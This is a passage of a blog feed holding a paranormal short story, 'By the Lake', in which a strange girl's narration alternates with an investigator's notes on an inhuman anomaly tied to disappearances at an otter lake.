sang to her and told her that she failed them and failed everyone and that the lake would take its price one way or another.&#xA;&#xA;She told me all this like I could do something about it, like I was part of it.&#xA;&#xA;I didn&#39;t understand, but I asked her what she thought the price might be and if she thought it was worth it, if she thought she might be willing to pay it if she knew what it really was.&#xA;&#xA;I asked her that question because I wanted her to figure it out on her own. I wanted her to think about what was important to her. I wanted her to recognize the love she had for her daughters and how that was clouding her judgement.&#xA;&#xA;I didn&#39;t know what she would do.&#xA;&#xA;She drowned herself in the lake.&#xA;&#xA;Beatrice took over the restaurant.&#xA;&#xA;I was sent back to the research station.&#xA;&#xA;She never talked to me again.&#xA;&#xA;---&#xA;&#xA;The otters here are another part of the anomaly. They are obsessed with humans. They study us just as much as we study them. They&#39;ve formed a particularly large raft and maintained it over generations, which is quite unusual. The males and females and the offspring all seem to stay close. There are so many of them that, even though the lake is very large, there are very few game fish left for anglers to catch.&#xA;&#xA;Some say they should have run out of food by now, but they obviously haven&#39;t.&#xA;&#xA;They don&#39;t seem to be any smarter than other otters, but they ratchet up the curiosity.&#xA;&#xA;So when they suddenly pulled away from the shore where the settlement was located, it was odd.&#xA;&#xA;They were acting strange. The locals didn&#39;t seem to care much, even though much of the tourism relied on them.&#xA;&#xA;It was doubly unfortunate because Lake Ochonkmah and the Otter Lodge had been featured on some popular podcast which got it recognized by real celebrities who were stopping by for photo ops.&#xA;&#xA;I think after Tiger&#39;s birthday party, though, that the tourism will die back down, due to all the bodies they found.&#xA;&#xA;The only one who noticed or cared about the otters was Melanie.&#xA;&#xA;She definitely noticed during the birthday party and tried to get Mr. Fletch, who runs the tours, to do something, but he wasn&#39;t there.&#xA;&#xA;Once he got back, I think she sent Axl Fucking Rose up there to talk to him. I was close enough to hear Mr. Fletch yell at him, telling him to mind his business and that he didn&#39;t care if they were sick as long as they were still in the water.&#xA;&#xA;---&#xA;&#xA;When I left the lodge, I noticed a white and red helicopter in the yard that had not been there before. Further away, toward the road I saw an area cleared of trees and a small, personal airplane was parked, also white and red. Toward the lake was a white and red jet ski. I noticed they all had little red ribbons on them and thought they must be presents.&#xA;&#xA;A group of people were walking in from the road, surrounding an attractive black man in white slacks.&#xA;&#xA;I recognized him: Tiger Woods.&#xA;&#xA;I was excited that our little outpost was so famous that someone like him would visit and I realized it must be a birthday party.&#xA;&#xA;I went down to the water to stay out of the way.&#xA;&#xA;I wanted to see if the otters had returned to this side of the cove.&#xA;&#xA;Once I scrambled down and got a better look, I saw that they were still as far away as they could be without going out into deeper water.&#xA;&#xA;Additionally, they seemed to be agitated and moved in jagged bursts in the water.&#xA;&#xA;I climbed back up the embankment and went to the General Store where Mr. Fletch ran the tours.&#xA;&#xA;The small desk and register were vacant. I looked at the books and post cards and the souvenirs and smiled.&#xA;&#xA;A man with long red hair came in and asked me a question.&#xA;&#xA;&#34;Excuse me, but is there something wrong with the otters?&#34;&#xA;&#xA;I was so excited that someone else noticed.&#xA;&#xA;&#34;I was thinking the same thing,&#34; I said.&#xA;&#xA;&#34;I know the local bevy has a reputation for being friendly, but even for normal otters, they seem distressed.&#34;&#xA;&#xA;He explained that he noticed their fur was matted which would terribly diminish their ability to keep warm and swim.&#xA;&#xA;I explained that they were normally on the near shore and that they&#39;d fled to the other side days ago, long before everybody else showed up.&#xA;&#xA;I further told him that I wasn&#39;t able to get any of the adults to understand how grave the situation was, not even the docents at the Lodge.&#xA;&#xA;He was puzzled but didn&#39;t have anything else to say.&#xA;&#xA;The party was starting and I went back down to the water&#39;s edge.&#xA;&#xA;I saw the nice man with red hair go back to Mr. Fletch but Mr. Fletch seemed to be angry about something so the nice man left again.&#xA;&#xA;I was so worried about the otters that I decided to go to them.&#xA;&#xA;I slipped into the freezing water, not shivering, but feeling my legs go numb almost immediately.&#xA;&#xA;I pushed deeper and started swimming.&#xA;&#xA;I wasn&#39;t fast like I&#39;d been in my dreams.&#xA;&#xA;I kept my head above the water because I knew that would be the end.&#xA;&#xA;I swam toward the otters and they ignored me.&#xA;&#xA;I swam and felt something touch my legs.&#xA;&#xA;I treaded water and looked down.&#xA;&#xA;I looked down and the water was super clear.&#xA;&#xA;It was clear and I saw Angie down there.&#xA;&#xA;I saw Angie, I saw Dr. Candice Burroughs.&#xA;&#xA;I saw Angie, and Dr. Candice Burroughs, and Margo Fillings, and Camilla Harper the poet.&#xA;&#xA;I saw Vanessa Glenn and her daughters Imelda, Margaret, Stephanie, and Beatrice.&#xA;&#xA;I saw them reaching for me, their smiling faces and their long outstretched arms and fingers.&#xA;&#xA;I felt them touching my feet and my legs.&#xA;&#xA;I expected them to be angry, but they were at peace.&#xA;&#xA;They wanted me to be at peace.&#xA;&#xA;I thought about how I was never truly loved here.&#xA;&#xA;Nobody accepted me.&#xA;&#xA;Nobody understood me.&#xA;&#xA;I was merely tolerated.&#xA;&#xA;I was never part of a family.&#xA;&#xA;I was never a friend, only an acquaintance.&#xA;&#xA;I didn&#39;t belong here.&#xA;&#xA;I never belonged here.&#xA;&#xA;I belonged somewhere else.&#xA;&#xA;I belonged somewhere else.&#xA;&#xA;Instead of going under to where they were, I floated on the water until it was golden.&#xA;&#xA;Until the sky was silver and the water was gold.&#xA;&#xA;I floated and I saw a place of crystal and glass, glowing with internal light.&#xA;&#xA;I saw them standing on the platform embracing and laughing.&#xA;&#xA;All the woman from the water were up there and they were happy.&#xA;&#xA;I floated toward them.&#xA;&#xA;I wanted to join them, but the platform was too high and I wasn&#39;t allowed.&#xA;&#xA;I wasn&#39;t welcome.&#xA;&#xA;I sank away and wanted to cry.&#xA;&#xA;I wanted to be alone and to cry.&#xA;&#xA;A strange woman approached me.&#xA;&#xA;Her face was plastic and her hair wasn&#39;t real.&#xA;&#xA;She approached me and said, &#34;I am your mother.&#34;&#xA;&#xA;I never had a mother before.&#xA;&#xA;I heard her say &#34;I am your mother&#34; and the voice was pure bliss, like melted chocolate and rainbows and warm nights and the kiss of a kitten&#39;s whiskers.&#xA;&#xA;I heard her and I believed her.&#xA;&#xA;I believed her and I let her embrace me.&#xA;&#xA;---&#xA;&#xA;Like I said, a dozen bodies from the lake, all perfectly preserved, all women who went missing, even a couple nobody knew were missing yet.&#xA;&#xA;A dozen bodies found on one hand and the disappearance of Melanie, the anomaly herself, on the other.&#xA;&#xA;You know what the main office told me?&#xA;&#xA;&#34;Forget about it. It doesn&#39;t matter.&#34;&#xA;&#xA;---&#xA;&#xA;ENDOFLINE&#xA;&#xA;#WhenIDream #Dreams #Dreaming #Dreamlands #Writer #Writing #Writers #WritingCommunity #ShortFiction #Fiction #Paranormal]]&gt;</description>
      <content:encoded><![CDATA[<h2 id="by-the-lake">By the Lake</h2>

<p>I read everything at the info kiosk of the Lake Ochonkmah Otter Lodge.</p>

<p>It used to be a hunting shack for otter hunters but was abandoned sometime around 1900.</p>

<p>In 1943, a husband and wife research team, Drs. Bartholomew and Candice Burroughs “rediscovered” the location while hiking around the lake and studying the local otters, which were rumored to be particularly sociable and friendly. They made camp on the site and made note of its location. Over multiple trips it became a bonafide research station and was repaired, built-upon, and expanded.</p>

<p>It was their life&#39;s work for 30 years and they developed a niche following among otter aficionados. The otters at Lake Ochonkmah were very friendly and completely unafraid of humans. The Burroughs speculated that the hunting had been easy and they never had a good explanation for it being abandoned.</p>

<p>One theory, borne out by examining remains, was that a mystery illness had thinned out the otters and wiped out the humans who knew about the location, leaving it free to recover and flourish.</p>

<p>The only reason to visit this place was to watch the otters. The water was far too cold year round to be comfortable for swimming and there were precious little in the way of game fish left after the otters had their fill.</p>

<p>Still, a small town grew up during the height of the Burroughs&#39; research, a country store for supplies and a bed and breakfast style boarding house for transients and travelers.</p>

<p>On October 15, 1975, Candice died in her sleep at the age of 61. There was no warning as she had been working with Bart the day before and gave no indication of being sick. Bart became understandably withdrawn and depressed and focused on his work. Less than a month later, he died in his sleep, as well, on November 22, 1975. He was 63.</p>

<p>Without the support of the doctors, the research station fell into disrepair and what little tourism there had been stopped entirely.</p>

<p>In 1987, the millionaire Margo Fillings swept in like a tornado and revitalized everything.</p>

<p>She never said why she was so passionate about this place, but she turned the old research station into an overnight learning experience and encouraged schools to bus kids in to learn all about the Ochonkmah Otters.</p>

<p>The general store was re-opened with a more worldly selection of goods, snacks, candy, soda, and the like.</p>

<p>The bed and breakfast was remodeled into a proper family restaurant with the rooms being used to house the staff.</p>

<p>A motel opened just outside of town to accommodate any other travelers.</p>

<p>The rest of my class was still in the observation room where it was kept dark so you could peer out the long glass floor to see the otters in their natural habitat.</p>

<p>I was out in the well-lit hallway, trying to talk to the guide, but she kept ignoring me, telling me she had somewhere she had to be and going back and forth between an office in the back and checking on the observation room.</p>

<p>She ran back and forth and back and forth.</p>

<p>She had to squint to see inside the observation room and she&#39;d look inside and shake her head.</p>

<p>And then scurry back to the office.</p>

<p>I didn&#39;t want to go into the observation room so I stayed out in the big lobby and read the infographics again.</p>

<p>Margo Fillings was the savior of the town according to the infographics.</p>

<p>She looked like a gymnast in her photos: short build, athletic, with thick legs, an attempt at a pixie cut but her red hair was too curly to stay down. Always smiling. Always looking directly at the camera.</p>

<p>My legs were thick, too, but so was the rest of me. Not so athletic.
Sometimes, my legs would stop working and I&#39;d have to sit down or lie down, but that didn&#39;t happen very often.</p>

<p>When the other kids from my class started to filter out of the observation room, I was looking for Angela and Angie, the best friends I&#39;d ridden down with.</p>

<p>Angela was really smart, good at math like I was, but also good at music which I wasn&#39;t. Angie was an artist and barely passed any other classes, not because she couldn&#39;t but because she didn&#39;t feel like it was worth the effort.</p>

<p>They were my friends, my only real friends.</p>

<p>I had trouble making friends because I was prone to talking too much or saying the wrong thing. I did that all the time. I said the wrong thing and people got mad, but never told me why they got mad.</p>

<p>Angela came out and she was rolling her eyes while walking toward me.</p>

<p>“Angie found a boy,” she told me.</p>

<p>Angie would latch onto a boy and obsess over them.</p>

<p>Then she would date them, get to know them, and suddenly get over them.</p>

<p>Angie came out with her arm wrapped tightly around a tall boy&#39;s waist.</p>

<p>He wasn&#39;t even handsome or pretty. He had stringy hair and his clothes were too baggy.
He looked dirty.</p>

<p>“He plays the fucking guitar in a band,” Angela told me.</p>

<p>That explained it, apparently.</p>

<p>Everyone else left, teachers, chaperones, students.</p>

<p>Everyone left except for Angela, Angie, Angie&#39;s new obsession and his “bandmates” who were just as dingy and he was.</p>

<p>Angie was pale and raven-haired like an angel might be, but she preferred to wear black, even her makeup was black.</p>

<p>Angela wore light blue slacks and a silk blouse. She was always so exquisite.</p>

<p>We stayed two more days, at the motel outside of town.</p>

<p>On the third morning, Angie was gone.</p>

<p>Angela told me that she&#39;d left with the band and we&#39;d be lucky to see her at all for a few weeks.</p>

<p>She was 17 and she liked to pretend she was an adult.</p>

<p>Angela was really quiet that day.</p>

<p>I think Angie didn&#39;t tell her that she was leaving with the band.</p>

<p>When I woke up the next morning, Angela was gone. Her clothes, her toiletries, her bag, and her car were all gone.</p>

<p>I walked back to town and into the Otter Lodge.</p>

<p>I walked in and told the lady who worked there, the same one from the overnight visit, that I was lost.</p>

<p>She asked me my phone number and I didn&#39;t know.</p>

<p>She asked me for my parent&#39;s names and I didn&#39;t know.</p>

<p>She asked me for my name and I didn&#39;t know.</p>

<hr>

<pre><code>According to Margo Fillings, the anomaly was here on her first visit to the town, back when she was first considering pouring her resources into it.

It looked like a teenaged white girl. Limp brown hair, a little pudgy, a little slow witted, but it spoke like a normal teenaged girl and it was wearing normal clothes.

She thought it was a mannequin because it was motionless, not breathing or moving. Its eyes were wide open, not blinking.

She touched it.

The skin was warm to the touch but stiff.

It shivered at her touch and immediately became supple.

Its chest began to rise and fall. When she looked at the face again, the eyes had closed. It appeared to be sleeping.

She assumed it was a runway and woke it up.

It&#39;s first words were, &#34;Hi, Margo!&#34;

Margo says she maintained her composure, but &#34;citation needed&#34; you know.

When she asked it &#34;What&#39;s your name?&#34;

It replied something like, &#34;Don&#39;t be silly; you know who I am.&#34;

So she gave it a name, &#34;Lillian&#34;, after the flower, and it took it.

We know this because Margo kept a journal. I&#39;ve read it. It&#39;s practically Exhibit A.

The journal says &#34;I said the first name I could think of. I remembered seeing lilies out front, so I called her Lillian. It was a question, I asked her if her name was Lillian and she agreed that it was. That wasn&#39;t what I was asking, but she just accepted it.&#34;

But if you ask Margo about it now, she will tell you that the anomaly is, in fact, &#34;Lillian Harper&#34; and that she was always &#34;Lillian Harper&#34; and that they knew each other before she found her in the back of the research building gathering dust, before she gave her a name.
</code></pre>

<hr>

<p>One time, a guest was here with her fiancé.</p>

<p>She was so kind, wearing white to contrast her dark wavey hair. She spoke like a poet, it was mesmerizing. She wrote about the trees and the flowers and the lake and the otters.</p>

<p>She found beauty everywhere she looked. Decaying leaves, moss, and mushrooms covering a fallen tree trunk. An otter&#39;s corpse washed up on the shoreline. The sun on her face and in her eyes. Storm clouds flashing in the distance. The sounds of the wind blowing the ghost lights over the water at night.</p>

<p>Her fiancé was comparatively grumpy. He was a writer, too and they thought this place would inspire them both.</p>

<p>For him, it was uncomfortable, aggravating his allergies, covering him in ants and spiders, spoiling their food. He only saw unnecessary turmoil.</p>

<p>There can be beauty in unexpected difficulties, right?</p>

<p>She saw it. Her eyes sparkled with it; her soul glowed and reveled in it.</p>

<p>She was kind to me, even though I couldn&#39;t walk.</p>

<p>I was in a chair most of the time. I would be in my spot in the chair outside the old research center in the morning and back in my room at night.</p>

<p>My arms worked, my lungs worked. I could breath and speak and think and smile.
But my legs felt like nothing at all. Like empty shells filled with dirt.
Like anchor weights tied to my pelvis.</p>

<p>I told them stories about the otters and about the people who used to work and live here.</p>

<p>I told them about the Drs. Burroughs and how they both died but nobody knew why. I thought it was the sadness.</p>

<p>This place had a sadness about it, always, but people would come and cover it up and ignore it.</p>

<p>They would find the life, the singing of the insects, the splashing of the otters, the waving of the trees, and ignore the emptiness underneath it.</p>

<p>They would study and sleep and observe and feel and love and eventually it would find them.</p>

<p>They would wonder where it all went and why it took so long to notice it was gone.</p>

<p>“Melancholy” they called it.</p>

<p>She thrived and grew and blossomed.</p>

<p>He withered.</p>

<p>All he left behind was a perfect bouquet of white lilies.</p>

<p>She threw them on the ground right in front of me.</p>

<p>They didn&#39;t wither.</p>

<p>They flourished.</p>

<hr>

<pre><code>They&#39;ve had to send multiple agents because every other agent eventually believes the lies.
First question I asked? &#34;Why not take it to a real lab instead of doing all the study here at a compromised location?&#34;

Answer: Any attempt to remove the anomaly from the site results in tremors that get worse the further away it&#39;s taken.

So they keep sending us and once we stop sending in updates, they come and get us and send in someone else.

I&#39;ve seen the photos and the records of the examinations of the anomaly and it definitely is not human.

It has the outward appearance of a teenage girl, but only superficially.

It&#39;s anatomy has been thoroughly detailed while it was in its dormant state.

Constant body temperature of 96° regardless of the outside conditions.

Smooth skin resembling that of a typical Caucasian but only from a distance. There are no pores and no body hair, not a single blemish. The skin cannot be cut or punctured using any methods we&#39;ve devised and it doesn&#39;t bruise. There is no evidence of veins or blood flow of any kind, no pulse at all.

It has the shape of breasts but no nipples. It has buttocks but no anus. Instead of a vaginal canal and urethra, it has a shriveled phallus with no openings. There are no visible testes.

The head appears almost entirely human. It has nostrils that seem to lead to a nasal cavity. Eyes with tear ducts that react as expected to light even when it is dormant. It has eardrums and eye lashes and eye brows. All the hair on the head seems to be attached as expected even when the rest of the body has none at all. It has a mouth with the correct looking teeth, a tongue, a trachea and esophagus, but its internal structure remains a mystery.

Endoscopy hits impossible dead ends when run down either throat tube.

It doesn&#39;t breath when it&#39;s dormant so we aren&#39;t even sure if it needs air.

While dormant, it has been submerged in water for prolonged periods without any ill effects.

We have observed that when it returns to its active state, sometimes only parts of the body revive fully, such that it appears to be paraplegic or quadriplegic. It compensates by entering a semi-dormant state and &#34;floating&#34; between locations. Even when done in full view of locals, none of them recall seeing it happen.

It has never demonstrated this ability while fully active, only while semi-dormant, a state that resembles &#34;sleeping&#34;.
</code></pre>

<hr>

<p>One time, my friends put on a musical production of Grease.</p>

<p>They know that I love musicals and singing even if I can&#39;t participate.</p>

<p>They staged it around the Lodge so I could sit out front. Even though I couldn&#39;t walk and had trouble speaking, they made sure I felt like part of the show.</p>

<p>I was able to move my arms and smile to “You&#39;re the one that I want!”</p>

<p>“Oh yes, indeed!”</p>

<p>The spectators noticed and the cast sang “We go together” to me while I was able to shift back and forth.</p>

<p>It elevated everybody&#39;s spirits.</p>

<p>After the musical was over, after the people had said their goodnights to each other and to me.</p>

<p>After I basked in the feeling of accomplishment and acceptance, I drifted off to sleep.</p>

<p>I dreamed of swimming in the lake. The water is far too cold for swimming in real life, but it was warm in the dream.</p>

<p>I was so far out that I couldn&#39;t see the shore on either side. The lake isn&#39;t that big, but in the dream it was.</p>

<p>I wasn&#39;t afraid. I wasn&#39;t afraid at all because the water was calm and it supported me.</p>

<p>Deep, deep below me, I could see lights and motion as if an entire city were down there.</p>

<p>I wanted to go down there. I wanted to see who it was.</p>

<p>But my head refused to go under the water. I would try but the water would push me back.
The water wanted me to stay up here.</p>

<p>I could almost hear them building something, creating something marvelous.</p>

<p>But it wasn&#39;t for me.</p>

<hr>

<pre><code>We&#39;ve checked air, water, food toxicology. We&#39;ve bagged insects and plants for allergens, poisons, or venoms.

We&#39;ve run up antenna to check for electromagnetic sources, Geiger counters for radiation, specialized microphones for ULF, ELF, UHF, and EHF.

Nothing.

We&#39;ve even had Astrologers, Diviners, and Ley Line experts check it out.

The local Native Americans were, unfortunately, driven out and killed by settlers long ago. The only record we have is the name of the lake itself, &#34;Ochonkmah&#34;, which looks like it&#39;s derived from something Native American but is too bastardized for a direct translation. It resembles the Choctaw word *achukma* which has positive connotations of &#34;good&#34; or &#34;pleasing&#34;.

The only other anomaly is a strong magnetic source out in deeper waters, assumed to be an ancient meteorite. It&#39;s far too cold and deep for regular divers and we&#39;ve yet to get permission to field a top-of-the-line manned submersible or ROV. Camera and robot claws we drop on lines inevitably hit snags. Cameras show significant debris around the site. What artifacts we&#39;ve hauled up matches what we would expect from Viking long boats. There is no good reason to find that sort of debris at this location.

The magnetic source could help explain the ghost lights which are known to float over the water during particularly warm autumns.

We&#39;ve caught them on film multiple times with various cameras. The purple glowing globules read very similar to St. Elmo&#39;s Fire. They cannot be ignus fatuus due to the lack of flammable gas. We&#39;ve yet to have a boat on the water fast enough to observe them up close.
</code></pre>

<hr>

<p>It had to be a dream, but it felt so real. It had to be a dream since nobody else saw it.</p>

<p>There was a festival in the main yard, but I was on the shore looking out over the lake.</p>

<p>I saw a silvery disk come out of the sky and make as if to land on the surface.</p>

<p>Before I could think, I was in the water, swimming with all my might toward it.</p>

<p>The water is too cold to swim in, but I was swimming and it wasn&#39;t that cold.</p>

<p>I never swam so fast before. My legs worked better than they ever had and pushed me forward while my arms carved great handfuls of water over and behind me, like I was climbing a mountain of snow.</p>

<p>I reached the disk and it was tiny, no bigger than a Frisbee.</p>

<p>I was certain it had been a spaceship but here it was no more than a toy.</p>

<p>I stopped swimming and found I could stand. The water out here should be quite deep but I stood up.</p>

<p>I looked back toward the shore and saw a tall, purple skinned humanoid motioning for me to pick up the disk.</p>

<p>His skin was dark and smooth, leading to thin arms that moved more like tentacles than something with bones and joints. His head was round like a matchhead and his eyes were black.</p>

<p>His slit-like mouth was smiling.</p>

<p>I&#39;m not sure how I could tell it was smiling, but it was.</p>

<p>I picked up the disk and he pointed out further into the water.</p>

<p>I turned and saw a massive blobby creature, like something made of the squishy from the bottom of the lake.</p>

<p>It was rushing away from us with a massive crooked wake.</p>

<p>Parts of it seemed like stones or rocks and two of them turned and I saw they were huge eyes, watching my hand holding the disk.</p>

<p>I held it close to my chest and flung it out like a Frisbee and the blob leaped after it, a giant mass of barely held together pieces shaped into a huge dog&#39;s head on a turtle&#39;s body with flippers for legs.</p>

<p>It grabbed the disk in its mouth and collapsed back onto the surface of the water with a <em>SLAP</em>.</p>

<p>The purple creature was applauding me and motioned for me to come closer.</p>

<hr>

<pre><code>Occasionally, this place hits the news cycles and tourism has a temporary boost.

The businesses open back up, people show up to run them. People show up and buy tickets, souvenirs.

The otters get to entertain a new batch of people.

It goes like it always goes here.

It&#39;s great at first, then it gets rougher, then it gets angrier, then something bad happens and it dries up.

Disappearances usually.

Maybe murder but no bodies are ever found.

Rumors start to flow.

People get afraid again.

It goes dormant.

The anomaly is always part of the revival and she reacts very poorly to the negative happenings.

She plays really hard at being upset and not understanding why people can&#39;t be kind and get along.

There is no way to know if it is &#34;genuine&#34; sadness as she isn&#39;t human to begin with.

She&#39;s very convincing and seems to know intimate details of the lives of those who live here. She can speak to their wants, needs, dreams, fears, weaknesses, everything as if she is their best friend in the whole world.

She knows things about me that I won&#39;t put down in a report.

She knows things about our research that she shouldn&#39;t. When she gets deep into esoterica, her voice changes a bit, becomes monotone, almost like she&#39;s reading a script.

Ask her about it afterwards? She claims she doesn&#39;t remember and seems to freak out if you play back a recording of it.

I&#39;m not sure how we can keep things from her as she seems to know everything that happens around the lake, including internal thoughts that are never voiced or written at all.

It may be too dangerous to continue the investigation and we may want to write off our losses and leave it be.
</code></pre>

<hr>

<p>I thought I was like a daughter to her.</p>

<p>She took me in and I lived and slept under the same roof as Imelda, Margaret, Stephanie, and Beatrice.</p>

<p>I was there for their first loves and their first heartbreaks.</p>

<p>I was there when they wondered what the point of it all was.</p>

<p>I helped them find meaning. I helped them understand the nature of people and of men.</p>

<p>I thought they would be strong enough to go out on their own, but they always went back to someone.</p>

<p>They seemed to not know themselves unless they were supporting a man.</p>

<p>It was sad and I told Mrs. Glenn it was sad and she agreed with me.</p>

<p>Mrs. Glenn and I wanted the girls to be self-sufficient like she was.</p>

<p>She raised all four girls without a man and she did a fine job.</p>

<p>Being the proprietor of the restaurant meant she had room and board for them as long as they worked.</p>

<p>She never did put me to work on the floor and she never told me why not. I asked and asked until eventually I stopped asking.</p>

<p>But I helped her with my stories and with my advice.</p>

<p>I told her about the history of the lake and the research station and the fur trackers and the otters.</p>

<p>I told her about the ghost lights and about the silver disk that came down from the sky.</p>

<p>I told her about the riches that had been lost time and again by strange ships that should never have tried to sail.</p>

<p>I told her about the plants and insects and which ones were safe and which ones were to be avoided.</p>

<p>She spun those into the recipes a little at a time, spreading good cheer and health with each meal sold.</p>

<p>When Imelda left, no note, just all her things gone and her and her boyfriend nowhere to be found, she came to me and I had no answers.</p>

<p>Imelda hadn&#39;t confided in me. None of the girls confided in me anymore.</p>

<p>When I asked them why, they told me they “outgrew” me and that was that.</p>

<p>But Imelda had been distant for a long time, keeping to herself.</p>

<p>Margaret was learning how to cook the special recipes with her mom and Mrs. Glenn couldn&#39;t be happier.</p>

<p>It made no sense for her to be the next to leave without a word.</p>

<p>But she was gone. Her clothes were gone. Her man was gone.</p>

<p>Imelda had never called and she expected the same from Margaret.</p>

<p>She didn&#39;t asked me for advice this time.</p>

<p>She didn&#39;t talk to me for a long time.</p>

<p>Not until Stephanie was the next to go missing.</p>

<p>She talked to me “before Beatrice went away,” she said.</p>

<p>She told me she knew what was happening and she thought she was paying her dues.</p>

<p>She thought she was doing what was required by making the recipes and serving them.</p>

<p>She said her missing girls sang dirges to her from the deep water.</p>

<p>They sang to her and told her that she failed them and failed everyone and that the lake would take its price one way or another.</p>

<p>She told me all this like I could do something about it, like I was part of it.</p>

<p>I didn&#39;t understand, but I asked her what she thought the price might be and if she thought it was worth it, if she thought she might be willing to pay it if she knew what it really was.</p>

<p>I asked her that question because I wanted her to figure it out on her own. I wanted her to think about what was important to her. I wanted her to recognize the love she had for her daughters and how that was clouding her judgement.</p>

<p>I didn&#39;t know what she would do.</p>

<p>She drowned herself in the lake.</p>

<p>Beatrice took over the restaurant.</p>

<p>I was sent back to the research station.</p>

<p>She never talked to me again.</p>

<hr>

<pre><code>The otters here are another part of the anomaly. They are obsessed with humans. They study us just as much as we study them. They&#39;ve formed a particularly large raft and maintained it over generations, which is quite unusual. The males and females and the offspring all seem to stay close. There are so many of them that, even though the lake is very large, there are very few game fish left for anglers to catch.

Some say they should have run out of food by now, but they obviously haven&#39;t.

They don&#39;t seem to be any smarter than other otters, but they ratchet up the curiosity.

So when they suddenly pulled away from the shore where the settlement was located, it was odd.

They were acting strange. The locals didn&#39;t seem to care much, even though much of the tourism relied on them.

It was doubly unfortunate because Lake Ochonkmah and the Otter Lodge had been featured on some popular podcast which got it recognized by real celebrities who were stopping by for photo ops.

I think after Tiger&#39;s birthday party, though, that the tourism will die back down, due to all the bodies they found.

The only one who noticed or cared about the otters was Melanie.

She definitely noticed during the birthday party and tried to get Mr. Fletch, who runs the tours, to do something, but he wasn&#39;t there.

Once he got back, I think she sent Axl Fucking Rose up there to talk to him. I was close enough to hear Mr. Fletch yell at him, telling him to mind his business and that he didn&#39;t care if they were sick as long as they were still in the water.
</code></pre>

<hr>

<p>When I left the lodge, I noticed a white and red helicopter in the yard that had not been there before. Further away, toward the road I saw an area cleared of trees and a small, personal airplane was parked, also white and red. Toward the lake was a white and red jet ski. I noticed they all had little red ribbons on them and thought they must be presents.</p>

<p>A group of people were walking in from the road, surrounding an attractive black man in white slacks.</p>

<p>I recognized him: Tiger Woods.</p>

<p>I was excited that our little outpost was so famous that someone like him would visit and I realized it must be a birthday party.</p>

<p>I went down to the water to stay out of the way.</p>

<p>I wanted to see if the otters had returned to this side of the cove.</p>

<p>Once I scrambled down and got a better look, I saw that they were still as far away as they could be without going out into deeper water.</p>

<p>Additionally, they seemed to be agitated and moved in jagged bursts in the water.</p>

<p>I climbed back up the embankment and went to the General Store where Mr. Fletch ran the tours.</p>

<p>The small desk and register were vacant. I looked at the books and post cards and the souvenirs and smiled.</p>

<p>A man with long red hair came in and asked me a question.</p>

<p>“Excuse me, but is there something wrong with the otters?”</p>

<p>I was so excited that someone else noticed.</p>

<p>“I was thinking the same thing,” I said.</p>

<p>“I know the local bevy has a reputation for being friendly, but even for normal otters, they seem distressed.”</p>

<p>He explained that he noticed their fur was matted which would terribly diminish their ability to keep warm and swim.</p>

<p>I explained that they were normally on the near shore and that they&#39;d fled to the other side days ago, long before everybody else showed up.</p>

<p>I further told him that I wasn&#39;t able to get any of the adults to understand how grave the situation was, not even the docents at the Lodge.</p>

<p>He was puzzled but didn&#39;t have anything else to say.</p>

<p>The party was starting and I went back down to the water&#39;s edge.</p>

<p>I saw the nice man with red hair go back to Mr. Fletch but Mr. Fletch seemed to be angry about something so the nice man left again.</p>

<p>I was so worried about the otters that I decided to go to them.</p>

<p>I slipped into the freezing water, not shivering, but feeling my legs go numb almost immediately.</p>

<p>I pushed deeper and started swimming.</p>

<p>I wasn&#39;t fast like I&#39;d been in my dreams.</p>

<p>I kept my head above the water because I knew that would be the end.</p>

<p>I swam toward the otters and they ignored me.</p>

<p>I swam and felt something touch my legs.</p>

<p>I treaded water and looked down.</p>

<p>I looked down and the water was super clear.</p>

<p>It was clear and I saw Angie down there.</p>

<p>I saw Angie, I saw Dr. Candice Burroughs.</p>

<p>I saw Angie, and Dr. Candice Burroughs, and Margo Fillings, and Camilla Harper the poet.</p>

<p>I saw Vanessa Glenn and her daughters Imelda, Margaret, Stephanie, and Beatrice.</p>

<p>I saw them reaching for me, their smiling faces and their long outstretched arms and fingers.</p>

<p>I felt them touching my feet and my legs.</p>

<p>I expected them to be angry, but they were at peace.</p>

<p>They wanted me to be at peace.</p>

<p>I thought about how I was never truly loved here.</p>

<p>Nobody accepted me.</p>

<p>Nobody understood me.</p>

<p>I was merely tolerated.</p>

<p>I was never part of a family.</p>

<p>I was never a friend, only an acquaintance.</p>

<p>I didn&#39;t belong here.</p>

<p>I never belonged here.</p>

<p>I belonged somewhere else.</p>

<p>I belonged somewhere else.</p>

<p>Instead of going under to where they were, I floated on the water until it was golden.</p>

<p>Until the sky was silver and the water was gold.</p>

<p>I floated and I saw a place of crystal and glass, glowing with internal light.</p>

<p>I saw them standing on the platform embracing and laughing.</p>

<p>All the woman from the water were up there and they were happy.</p>

<p>I floated toward them.</p>

<p>I wanted to join them, but the platform was too high and I wasn&#39;t allowed.</p>

<p>I wasn&#39;t welcome.</p>

<p>I sank away and wanted to cry.</p>

<p>I wanted to be alone and to cry.</p>

<p>A strange woman approached me.</p>

<p>Her face was plastic and her hair wasn&#39;t real.</p>

<p>She approached me and said, “I am your mother.”</p>

<p>I never had a mother before.</p>

<p>I heard her say “I am your mother” and the voice was pure bliss, like melted chocolate and rainbows and warm nights and the kiss of a kitten&#39;s whiskers.</p>

<p>I heard her and I believed her.</p>

<p>I believed her and I let her embrace me.</p>

<hr>

<pre><code>Like I said, a dozen bodies from the lake, all perfectly preserved, all women who went missing, even a couple nobody knew were missing yet.

A dozen bodies found on one hand and the disappearance of Melanie, the anomaly herself, on the other.

You know what the main office told me?

&#34;Forget about it. It doesn&#39;t matter.&#34;
</code></pre>

<hr>

<p><code>END_OF_LINE</code></p>

<p>#WhenIDream #Dreams #Dreaming #Dreamlands #Writer #Writing #Writers #WritingCommunity #ShortFiction #Fiction #Paranormal</p>
]]></content:encoded>
      <author>J. R. DePriest</author>
      <guid>https://infosec.press/read/a/ze7auutpv7</guid>
      <pubDate>Mon, 06 Jan 2025 02:43:59 +0000</pubDate>
    </item>
    <item>
      <title>I&#39;ve been recently enjoying Mashbuild (www.washmodistilling.com/mashbuild), a...</title>
      <link>https://infosec.press/beveragenotes/ive-been-recently-enjoying-mashbuild-www-washmodistilling-com-mashbuild-a</link>
